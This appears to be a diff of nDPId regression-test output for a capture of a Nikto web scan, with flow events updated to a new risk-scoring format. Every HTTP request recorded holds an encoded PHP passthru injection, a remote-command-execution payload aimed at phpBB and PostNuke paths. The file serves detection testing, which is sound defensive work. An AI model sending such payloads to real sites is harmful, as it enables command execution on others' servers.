-01025{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"ts_msec":1576420277752,"pkt":"AAAAAAAAAAAAAAAACABFAAFjNwZAAEAGBI1\/AAABfwAAAca4H5DKtQ4b91nN3YAYAED\/VwAAAQEICp1m\/yCdZv8gR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01025{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00873{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"ts_msec":1576420277753,"pkt":"AAAAAAAAAAAAAAAACABFAAFeFwdAAEAGJJF\/AAABfwAAAca6H5C+9y4cicj8j4AYAED\/UgAAAQEICp1m\/yGdZv8hR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-01019{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01208{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00885{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"ts_msec":1576420277754,"pkt":"AAAAAAAAAAAAAAAACABFAAFnn4NAAEAGnAt\/AAABfwAAAca8H5BO76agHBQLN4AYAED\/WwAAAQEICp1m\/yKdZv8iR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="}
-01029{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01218{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"ts_msec":1576420277756,"pkt":"AAAAAAAAAAAAAAAACABFAAFsUT9AAEAG6kp\/AAABfwAAAca+H5B2qmgj3lZSb4AYAED\/YAAAAQEICp1m\/ySdZv8kR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
-01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"ts_msec":1576420277758,"pkt":"AAAAAAAAAAAAAAAACABFAAFmwkJAAEAGeU1\/AAABfwAAAcbAH5DScvtgYIpbaYAYAED\/WgAAAQEICp1m\/yadZv8mR0VUIC9tb2R1bGVzL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCg0K"}
-01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01217{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":659,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277758,"flow_last_seen":1576420277758,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"ts_msec":1576420277758,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50880,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"ts_msec":1576420277760,"pkt":"AAAAAAAAAAAAAAAACABFAAFkSaBAAEAG8fF\/AAABfwAAAcbCH5CzknC\/qWQ1toAYAED\/WAAAAQEICp1m\/yidZv8oR0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="}
-01026{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
+01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":660,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277760,"flow_last_seen":1576420277760,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277760,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"ts_msec":1576420277762,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
